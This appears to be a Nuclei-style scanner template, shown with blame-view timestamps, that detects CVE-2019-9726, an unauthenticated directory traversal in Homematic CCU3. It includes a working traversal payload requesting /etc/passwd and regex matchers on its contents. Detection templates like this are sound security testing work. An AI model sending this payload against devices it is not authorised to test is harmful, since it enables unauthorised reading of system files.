2022-02-25 00:08:03 +00:00
id : CVE-2019-9726
2022-04-22 10:38:41 +00:00
2022-02-25 00:08:03 +00:00
info :
2022-02-27 14:48:25 +00:00
name : Homematic CCU3 - Directory Traversal / Arbitrary File Read
2022-02-25 00:08:03 +00:00
author : 0x_Akoko
severity : high
2022-05-17 09:18:12 +00:00
description : Directory Traversal / Arbitrary File Read in eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
2022-02-25 00:08:03 +00:00
reference :
- https://atomic111.github.io/article/homematic-ccu3-fileread
- https://www.cvedetails.com/cve/CVE-2019-9726
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-02-25 00:08:03 +00:00
cvss-score : 7.5
cve-id : CVE-2019-9726
cwe-id : CWE-22
2022-02-27 14:46:53 +00:00
tags : cve,cve2019,homematic,lfi
2022-02-25 00:08:03 +00:00
requests :
- method : GET
path :
2022-02-27 14:46:53 +00:00
- "{{BaseURL}}/.%00./.%00./etc/passwd"
2022-02-25 00:08:03 +00:00
matchers-condition : and
matchers :
2022-02-27 14:46:53 +00:00
- type : regex
2022-02-25 00:08:03 +00:00
part : body
2022-02-27 14:46:53 +00:00
regex :
- "root:.*:0:0:"
- "bin:.*:0:0:"
condition : or
2022-02-25 00:08:03 +00:00
- type : status
status :
- 200